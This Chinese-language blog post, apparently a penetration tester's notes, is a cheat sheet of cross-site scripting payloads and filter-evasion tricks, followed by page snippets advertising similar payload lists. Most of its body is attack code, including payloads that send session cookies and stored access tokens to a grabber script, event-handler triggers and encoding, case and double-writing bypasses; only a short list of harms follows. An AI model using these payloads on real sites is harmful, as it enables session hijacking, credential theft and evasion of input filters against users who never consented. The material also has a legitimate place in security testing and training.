【XSS】payload 常用构造和变形方法

最新推荐文章于 2025-04-12 10:55:57 发布
最新推荐文章于 2025-04-12 10:55:57 发布
阅读量5.7k 收藏 30
点赞数 12
分类专栏: Web渗透 文章标签: xss 前端 网络安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_65837674/article/details/136497241
版权
本文详细介绍了XSS攻击的典型标签、利用内联和行内CSS、获取敏感信息、鼠标和键盘事件触发、以及payload的各种变形技巧。同时提到了XSS的危害和防范措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS 构造 payload(利用 “<>” 构造 HTML 标签或 标签)

一、典型标签:

<script>alert('xss')</script>
"><script>alert('xss')</script>

二、获取管理员 cookie 或敏感访问令牌,并把它发送到指定的页面:

<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>

<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>

<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>

<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>

三、利用 HTML 标签的属性

"><img src=x οnerrοr=alert("XSS");>

<img src=x:alert(alt) onerror=eval(src) alt=xss>

<img src=x onerror=alert('XSS');>

<img src=x onerror=alert(String.fromCharCode(88,83,83));>

四、利用鼠标事件触发恶意代码
在这里插入图片描述
示例:

<button onclick=alert('xss')>触发按钮</button>    鼠标单击元素触发

<button ondbclick=alert('xss')>触发按钮</button>    鼠标双击

<button onmousedown=alert('xss')>触发按钮</button>    鼠标被按下

<button onmouseover=alert('xss')>触发按钮</button>    鼠标移动到元素上

<button onmouseout=alert('xss')>触发按钮</button>     鼠标从元素上移开

五、利用键盘事件触发恶意代码

function test(){alert('回显字样');}

onkeydown某个键盘按键被按下:
<img src="javascript:void(0)" onerror="document.οnkeydοwn=function(e){if(e.keyCode==65){alert('XSS')}}"/>
#javascript:void(0)  ---> 图片不会正常显示,但能执行命令
#该标签表示键盘输入 'A' 时就会触发恶意语句,'A'ASCII码为65
<input type="text" onkeydown="test()">    //<input>标签的输入框

onkeyup某个按键被松开:
<input type="text" onkeyup="test()">

onkeypress某个按键被按下并松开:
<input type="text" onkeyup="test()">

六、利用CSS(了解,并不熟悉)
行内样式方法:

1.这段 payload 利用了 HTML 元素的 style 属性来设置内联样式。
2.将一个 div 元素的背景图片设置为一个 JavaScript URL,该 URL 会在加载时执行 alert('xss')3.现代浏览器通常不允许在 CSSurl() 函数中执行 JavaScript,所以这种方法可能不会生效。

<div style="background-image:url(javascript:alert('xss'))">

页内样式方法:

1.这段 payload 中使用了 <style> 标签来定义页内样式。
2.将 body 元素的背景图片设置为一个 JavaScript URL,同样,这个 URL 会在加载时执行 alert('xss')3.但和行内样式的情况一样,这种方法可能不会生效。

<style>Body{background-image:url(javascript:alert('xss'))}</style>

外部样式方法:

1.这段 payload 中通过链接到一个外部 CSS 文件(xss.css)来注入恶意代码。
2.这个外部 CSS 文件可能包含类似于前面两种方法的恶意代码,但由于 CSS 本身不能执行 JavaScript,可能就需要利用某些浏览器或应用程序的特定漏洞来执行恶意代码。

<link rel="stylesheet" type="text/css" href="./xss.css">

XSS payload 变形方法

大小写

<sCript>alert('xss')</Script>        将标签中的部分小写字母改为大写

双写

<scrscriptipt>alert('xss')</scrscriptipt>        对原来的<script>标签变形

引号

<img src="#" onerror="alert('xss')"/>        双引号包裹执行命令的alert函数
<img src="#" onerror=alert`xss`/>        反引号代替括号包裹xss内容

/ 代替空格

<img/src='#'/onerror='alert('xss')'/>

Tab 与回车

在语句中穿插 Tab和回车

<a href="j
avascript:alert('xss')">click me!
</a>

编码

<a href="j&#97;v&#x61;script:alert('xss')>click me!</a>        HTML实体编码
%3Cscript%3Ealert('xss')%3C/script%3E        URL编码

【附】XSS漏洞危害

  • 盗取各种用户账号
  • 窃取用户Cookie资料,冒充用户身份进入网站
  • 劫持用户会话,执行任意操作
  • 刷流量,执行广告弹窗
  • 传播蠕虫病毒
  • 记录用户的键盘输入
各种 XSS Payload 速查清单
Sumarua的博客
07-18 1658
各种XSSPayload速查清单
xss绕过,payload全集
热门推荐
spang_33的博客
07-05 2万+
XSS总结:        xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.youkuaiyun.com/course/detail/8585里面的修复原理补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。&lt;img src=x onerror=alert(1)&...
黑盒渗透测试中的常见的20种Payload生成技法,从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
04-12 940
Payload,这玩意儿在网络安全里头,就像特种部队手里的定制武器。SANS(SysAdmin, Audit, Network, Security)的报告都说了,传统Payload的成功率,惨不忍睹!就这情况下,你得整出能自己适应环境的智能攻击向量——这可不是光绕过字符过滤这么简单,还得骗过AI的“认知”。从协议级的花式逃逸,到多态编码引擎,再到云原生环境下的元数据滥用,甚至还有AI对抗样本生成!:协议解析器也有犯迷糊的时候,利用它的边界判断缺陷,就能溜过去。:未来的Payload,可能都是AI生成的!
XSS与靶场(史上最详细附带payload)
qq_34598847的博客
10-17 4579
Cookie Session都是用来跟踪浏览器用户身份的会话方式,但是两者的应用场景不太一样。Cookie 一般用来保存用户信息 比如①我们在 Cookie 中保存已经登录过得用户信息,下次访问网站的时候页面可以自动帮你填写登录的一些基本信息;②一般的网站都会有保持登录也就是说下次你再访问网站的时候就不需要重新登录了,这是因为用户登录的时候我们可以存放了一个 Token 在 Cookie 中,下次登录的时候只需要根据 Token 值来查找用户即可(为了安全考虑,重新登录一般要将 Token 重写)
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
XSS常用Payload
z2560088的博客
01-11 9949
1.普通的 <ScRipt>alert(1)</ScRipt> 1"><ScRipt>alert(1)</ScRipt>2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过 ' onclick ='javascript:alert(1)'// " onclick ='javascript:alert(1)'// 3.<> script onclick被过滤,用a标签绕过 "></input><
xss payload构造方法
weixin_48734687的博客
10-01 2607
对照教程闯了几关总结一下各种绕过方式 url传参注入 未对参数进行任何过滤的 payload: <script>alert()</script> <img src=1 onerror=alert()> payload被引号包裹的 例如:<input name=keyword value="<script>alert()</script>">
xss常用Payload总结
csd_ct的专栏
01-03 1万+
xss常用Payload总结 渗透测试时,常遇到页面输入框、留言板等输入交互点,大多是xss漏洞易出现的常见场景之一,记录几种常用xss注入的姿势 1.img 注入 快速探测是否存在xss 1) <img src='x' onerror='alert(1)'> 2) <img src='x' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))"> 2.iframe 注入 后台做了相
28、XSS常见payload
Web安全工具库
01-02 5924
环境:http://xss-quiz.int21h.jp 一、Stage #1 无过滤xss漏洞 1、随便输入字符:123 2、输入payload: 3、弹出对话框,说明存在xss漏洞 二、Stage #2 属性中的xss漏洞 1、在窗口中输入payload:,查看审查元素,payload被写在一个标签中 2、重新构造payload,先闭合标签: "> 或者 "οnmοuseοve...
利用location来变形我们的XSS Payload
即刻出发吧
04-06 1802
XSS的时候,有时候有的过滤器很变态,会过滤很多特殊符号关键词,比如&、(、)、#、'、",特别是&括号,少了的话payload很难构造出来。 举个例子吧,比如过滤器过滤了array("(",")","&","\\","","'"),而没有过滤双引号,输出点在,xxxx这里,怎么构造一个可以利用的XSS Payload? 过滤代码如下: 所有人肯定都知道,先闭合
xss漏洞手工构造payload
07-28
- *1* *2* *3* [反射型XSS、存储型XSSDOM型XSS的简介及XSS常见payload构造变形](https://blog.youkuaiyun.com/bwxzdjn/article/details/123645177)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...
XSS测试payload
09-19
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
xss语句构造.docx
01-02
本文将详细介绍XSS语句的构造方法,包括常见的大小写绕过、双写绕过、空格代替、事件的使用等。 一、利用构造HTML/JS 可以利用构造HTML标签标签。在测试页面提交参数[利用构造HTML/JS</h1>],提交[<script>alert...
构造XSS语句技巧与绕过方法详解
本文档总结了在实际工作中常用XSS构造方法,以帮助开发者理解防范这类安全漏洞。 1. 利用构造HTML/JS 这是最基本的XSS攻击手段,通过在URL或HTML属性中插入HTML标签JavaScript代码。例如,在提交参数时,可以...
XSS漏洞-02】XSS构造变形及防御
cc
02-11 5689
简单来说,输入验证就是对用户提交的信息进行有效验证,仅接受指定长度范围内的,采用适当格式的内容提交,阻止或者忽略除此之外的其他任何数据。例子中包含两种语言,HTML语言与JS语言,其中HTML语言对大小写不敏感,也就是说无论是大小写,该语言都认为是同一个函数,而。HTML语言中对引号的使用不敏感,但是某些过滤函数对引号则是“锱铢必较”,因此我们可以使用不同引号来闭合XSS语句。因此在XSS漏洞的防范上,一般会采用"对输入进行过滤""输出进行转义"的方式进行处理。可以对标签属性值进行转码,用来绕过过滤。
xss payload
weixin_33701564的博客
06-29 409
><SCRIPT>alert("hello")</SCRIPT> 转载于:https://www.cnblogs.com/fanzi2009/archive/2009/08/13/1545474.html
终极万能XSS Payload
None安全团队
03-10 6757
前言: 在进行跨站脚本攻击的时候(xss),通常会需要我们通过插入的代码场景构造payload。就比较耗费时间,为了更方便的去测试漏洞,万能XSS payload就出现了 什么是万能XSS payload: 这里对它的定义就是 可以适应各种场景进行js代码执行的 payload,只需要有这一条payload即可(例如闭合html 闭合js) 下面我们来看看 payload长什么样子: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=al...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值